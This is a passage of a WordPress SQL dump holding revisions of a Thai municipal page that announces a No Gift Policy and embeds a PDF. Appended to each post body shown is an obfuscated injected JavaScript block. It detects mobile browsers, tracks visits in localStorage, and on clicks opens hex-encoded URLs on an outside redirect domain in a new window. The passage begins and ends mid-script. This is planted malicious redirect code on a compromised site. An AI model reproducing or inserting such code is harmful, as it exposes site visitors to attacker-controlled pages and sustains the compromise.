os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:40:09','2025-06-09 06:40:09','',859,'http://pakhaeng.ssk.in.th/?p=1310',0,'revision','',0),
(1311,1,'2025-06-09 13:40:10','2025-06-09 06:40:10','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true,\"align\":\"wide\"} -->\n<div class=\"wp-block-file alignwide\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:40:10','2025-06-09 06:40:10','',859,'http://pakhaeng.ssk.in.th/?p=1311',0,'revision','',0),
(1312,1,'2025-06-09 13:40:27','2025-06-09 06:40:27','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true,\"align\":\"wide\"} -->\n<div class=\"wp-block-file alignwide\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 